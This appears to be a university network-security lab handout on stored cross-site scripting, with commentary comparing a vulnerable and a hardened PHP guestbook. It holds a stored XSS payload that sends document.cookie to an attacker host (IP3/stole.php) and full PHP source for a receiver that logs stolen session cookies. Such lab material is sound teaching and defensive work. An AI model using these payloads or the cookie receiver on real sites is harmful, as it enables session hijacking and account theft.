
INTERNATIONAL UNIVERSITY
School of Computer Science and Engineering

LAB x: Cross Site Scripting Attack

Course: Network and System Security
Lecturer: Pham Van Hau, PhD
Duration: 135 minutes
Date: ..........
Student ID: ..........
Student name: ..........

Introduction

Figure 1: Vul Server (IP1), User Machine (IP2), Hacker (IP3)

Set up a network that consists of three virtual machines (as depicted in Figure 1) in which Secure Server is a web server powered by Apache with PHP and MySQL enabled. In the home directory of your web server (for Apache, it is /var/www/), create the directory called "admin" (/var/www/admin). Copy the three files index.php, login.php, and protected.php to /var/www/admin, and copy xssvul.php to /var/www/. Create the messages table in the MySQL server: log in to your MySQL server and run

    CREATE TABLE IF NOT EXISTS `messages` (`NAME` varchar(30), `Message` longtext) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=13;

(The AUTO_INCREMENT option has no effect here, because the table has no auto-increment column; MySQL accepts it and ignores it.) User and Attacker are two machines with Firefox installed. Normally, you need to enter the correct username and password in the login.php page in order to load the protected.php page. The attacker (on the attacker machine) does not know the username and password of the secure server.
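The lab does not show the contents of xssvul.php. The following is an added example, not the lab's file and not the course's code, of a guestbook page in the shape the lab describes: a Name/Message form whose rows are stored in the messages table and echoed back to every visitor. It puts the vulnerable output path and the hardened one side by side. The form field names (name, message), the PDO DSN and the database credentials are assumptions.

```php
<?php
// Added example (not the lab's xssvul.php): guestbook with both output paths.
// Assumed: form fields are named "name" and "message"; DSN and credentials are placeholders.

const DB_DSN  = 'mysql:host=127.0.0.1;dbname=xsslab;charset=latin1'; // assumed
const DB_USER = 'xsslab';                                             // assumed
const DB_PASS = 'xsslab';                                             // assumed

// VULNERABLE: stored data is concatenated straight into the HTML. A stored Message of
//   <a href="#" onclick="...">Click here!</a>
// becomes live markup for every visitor who loads the page (stored XSS).
function render_row_vulnerable(string $name, string $message): string
{
    return "<p><b>$name</b>: $message</p>\n";
}

// HARDENED: HTML-encode on output. ENT_QUOTES also encodes ' and ", so a value
// cannot break out of an attribute either; the payload is displayed as plain text.
// ISO-8859-1 matches the latin1 charset of the table created by the lab.
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'ISO-8859-1');
}

function render_row_safe(string $name, string $message): string
{
    return '<p><b>' . html($name) . '</b>: ' . html($message) . "</p>\n";
}

function db(): PDO
{
    $pdo = new PDO(DB_DSN, DB_USER, DB_PASS);
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    return $pdo;
}

$pdo = db();

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $name    = substr((string)($_POST['name'] ?? ''), 0, 30); // NAME is varchar(30)
    $message = (string)($_POST['message'] ?? '');
    // Prepared statement: the text is stored verbatim (HTML escaping belongs at
    // output time, not in the database), but it can never alter the SQL.
    $stmt = $pdo->prepare('INSERT INTO `messages` (`NAME`, `Message`) VALUES (?, ?)');
    $stmt->execute([$name, $message]);
}

echo "<form method=\"post\">\n";
echo "Name: <input name=\"name\" maxlength=\"30\"> Message: <input name=\"message\">\n";
echo "<input type=\"submit\" value=\"Post\">\n</form>\n";

foreach ($pdo->query('SELECT `NAME`, `Message` FROM `messages`') as $row) {
    // Swap in render_row_vulnerable() to reproduce the behaviour the lab relies on.
    echo render_row_safe($row['NAME'], $row['Message']);
}
```

The check to run after deploying the hardened version is the same one the lab uses: post a message containing a script tag and confirm that the page shows the tag literally instead of popping an alert box.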

Normal Operation

From machine "User Machine", enter http://ip1/admin/index.php in the address bar of the web browser. Enter the username "xss" and the password "pass". After the correct username and password are entered, the web server creates a session identifier and gives it to the web browser as a cookie (PHP names this cookie PHPSESSID by default). Every time the web browser wants to view http://ip1/admin/protected.php, it must present this session identifier. To view it, enter "javascript:alert(document.cookie)" in the address bar of your web browser; if your Firefox refuses javascript: URLs typed in the address bar, evaluate document.cookie in the Web Console instead. Note that this only works because the session cookie is set without the HttpOnly flag (PHP's session.cookie_httponly setting is off by default); with HttpOnly set, document.cookie would not reveal the session cookie.

Attack

From the attacker machine, the attacker wants to steal the session identifier of the user on "User Machine". This can be done thanks to the XSS vulnerability of the page http://ip1/xssvul.php. First, verify the vulnerability by entering the following information into the page:

    Name=Test
    Message=<script>alert("test")</script>

If an alert box appears, the page echoes stored input into its HTML without encoding it. Now enter the following text into the message box and click on "Click here!":

    <a href="#" onclick="window.location='http://IP3/stole.php?text='+escape(document.cookie); return false;">Click here!</a>

(stole.php saves the cookie!) Because the message is stored in the messages table, this is a stored XSS: every user who later loads xssvul.php and clicks the link sends their own document.cookie, URL-encoded by escape(), to the attacker's machine at IP3 in the text query parameter.
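The lab only says that stole.php saves the cookie. The following is an added example, not the lab's stole.php, of the receiver that the payload's window.location points at: it records whatever arrives in the text parameter, together with the sender's address and a timestamp, and then redirects the victim back to the guestbook. The log file path is an assumption, and the redirect target uses the lab's ip1 placeholder.

```php
<?php
// Added example (not the lab's stole.php): receiver for the exfiltrated cookie.
// Assumed: LOG_FILE is writable by the Apache user; ip1 is the lab's web server.

const LOG_FILE = '/var/www/stolen.log'; // assumed path

// Append one tab-separated line per hit: timestamp, client IP, cookie text.
// PHP has already URL-decoded the escape()'d value when it filled $_GET.
// Newlines are stripped so a crafted value cannot forge extra log lines.
function record_cookie(string $text, string $ip, string $logFile): bool
{
    $clean = str_replace(["\r", "\n"], ' ', $text);
    $line  = sprintf("%s\t%s\t%s\n", date('c'), $ip, $clean);
    return file_put_contents($logFile, $line, FILE_APPEND | LOCK_EX) !== false;
}

$text = (string)($_GET['text'] ?? '');
if ($text !== '') {
    record_cookie($text, $_SERVER['REMOTE_ADDR'] ?? '-', LOG_FILE);
}

// Send the victim back to the page they came from.
header('Location: http://ip1/xssvul.php', true, 302);
```

Two caveats a practitioner should keep in mind. First, even without stole.php the cookie already lands in the attacker's Apache access log, because the request line including the query string is logged; the script only makes it convenient to read. Second, escape() is deprecated and leaves the "+" character unencoded, which PHP then decodes as a space; encodeURIComponent() is the modern equivalent and encodes it correctly. On the defending side, setting session.cookie_httponly=1 (in php.ini, or via ini_set() before session_start()) stops this particular payload from reading the session cookie, but the injection itself remains until the stored messages are HTML-encoded on output.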
